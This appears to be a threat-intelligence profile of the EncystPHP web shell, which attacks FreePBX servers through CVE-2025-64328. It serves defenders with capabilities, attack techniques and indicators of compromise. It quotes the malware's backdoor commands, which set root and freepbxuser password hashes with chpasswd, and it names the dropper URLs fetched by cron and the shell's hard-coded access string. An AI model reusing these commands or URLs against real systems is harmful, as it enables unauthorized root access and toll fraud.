EncystPHP
EncystPHP is a PHP web shell targeting Sangoma FreePBX/Endpoint Manager environments. It has been observed since early December 2025 in campaigns exploiting CVE-2025-64328, a post-authentication command injection vulnerability in FreePBX, to gain execution as the asterisk user and deploy persistent web shells on internet-exposed VoIP/PBX servers. FortiGuard Labs named the malware EncystPHP and linked the activity to the financially motivated INJ3CTOR3 operation, which has a history of targeting VoIP infrastructure for toll fraud and related abuse.
High-confidence reported capabilities include remote command execution, persistence, and deployment of additional web shells/payloads. EncystPHP masquerades as legitimate FreePBX files, notably ajax.php, and in some reports presents an operator interface titled "Ask Master." It can enumerate the filesystem and processes, query active Asterisk channels, list SIP peers, and retrieve FreePBX and Elastix configuration files. Reported post-compromise actions include harvesting database configuration from /etc/freepbx.conf, creating a root-level local account named newfpbx with UID 0, resetting multiple account passwords, escalating privileges, injecting SSH public keys, modifying configuration to keep SSH port 22 open, deleting cron jobs and user accounts, removing competing web shells, deleting the Endpoint Manager module, restoring permissions to avoid service exceptions, and tampering with or deleting logs and temporary files for defense evasion.
Persistence is established through cron-based re-download and execution of additional droppers, including retrieval of k.php from 45.234.176.202 (crm.razatelefonia.pro). The malware and associated droppers were reported as Base64-encoded and decoded at runtime, with web shell copies placed across multiple web-accessible paths under the FreePBX web tree. Fortinet reported detections as PHP/EncystPHP.A!tr and BASH/EncystPHP.A!tr.
Observed indicators and infrastructure directly mentioned in reporting include 45.234.176.202, crm.razatelefonia.pro, hxxp://45.234.176.202/new/c, hxxp://45.234.176.202/new/k.php, and scanning/probing associated with 160.119.76.250. One observed web shell access pattern used a GET request to /admin/modules/phones/ajax.php with an md5 parameter containing the hard-coded string cf710203400b8c466e6dfcafcf36a411; reporting noted this value is compared as a string rather than validated as a true MD5 hash. EncystPHP has been widely reported in compromises of vulnerable FreePBX systems, with more than 900 infected FreePBX servers observed during the campaign wave.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
A sophisticated attack campaign leveraging a critical FreePBX vulnerability to deploy a persistent webshell dubbed “EncystPHP,” enabling threat actors to gain complete administrative control over compromised VoIP systems.
As recently as last week, Fortinet revealed the threat actor behind the activity has weaponized CVE-2025-64328 starting early December 2025 to deliver a web shell codenamed EncystPHP. | In 2022, the threat actor shifted its focus to the Elastix system via CVE-2021-45461. These incidents begin with the exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web shell in the target environments.
FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Prior campaign generations were documented by Check Point Research in 2020, Palo Alto Unit 42 in 2022, and Fortinet in January 2026.
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
4 techniques
Execution
"Initial persistence is established through crontab entries that download the secondary dropper k.php every minute."
By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges, enabling arbitrary command execution on the compromised host...
Persistence
7 techniques
Persistence
"Initial persistence is established through crontab entries that download the secondary dropper k.php every minute."
"...resets multiple user account passwords to a single value, and injects SSH public keys to maintain backdoor access."
This version is also adding the following backdoor accounts: echo 'root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e ... echo 'freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e
Privilege Escalation
5 techniques
Privilege Escalation
"Initial persistence is established through crontab entries that download the secondary dropper k.php every minute."
“By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges…”
Stealth
7 techniques
Stealth
"By mimicking legitimate FreePBX components, it attempts to 'evade immediate detection'"
“written to disk, masquerading as a legitimate FreePBX file named ajax.php… [and] forges timestamps to match those of legitimate files”
"EncystPHP also tampers with log files and disables error reporting to hinder forensic analysis and detection efforts."
Defense Impairment
2 techniques
Defense Impairment
Credential Access
2 techniques
Credential Access
Discovery
4 techniques
Discovery
The web shell also exposes an interactive interface that supports several predefined operational commands. This includes file system enumeration, process inspection... and retrieving multiple FreePBX and Elastix configuration files.
Lateral Movement
1 technique
Lateral Movement
Command and Control
2 techniques
Command and Control
Impact
1 technique
Impact
IOCs tracked for this family
14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A prior campaign malware/dropper associated with the same FreePBX-focused toll fraud activity. The content references a January 2026 encystPHP campaign and its dropper as an earlier generation preceding JOMANGY.
A web shell used by attackers compromising vulnerable FreePBX systems. It is accessed via a hard-coded string passed in the misleading "md5" parameter, and observed variants also add multiple backdoor accounts to the compromised host.
A web shell deployed onto vulnerable Sangoma FreePBX instances to enable remote command execution and persistent unauthorized access, reportedly running with elevated privileges.
A PHP web shell/dropper deployed after exploitation of CVE-2025-64328 in Sangoma FreePBX. Provides remote command execution and persistence, deploys additional web shells/payloads, performs system manipulation (e.g., locking key files, harvesting DB configs, deleting cron jobs and user accounts, removing rival web shells), establishes long-term access (creates root-level user, resets passwords, injects SSH key, keeps SSH/22 open), and conducts defense evasion (erases logs, restores permissions, removes the Endpoint Manager module).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.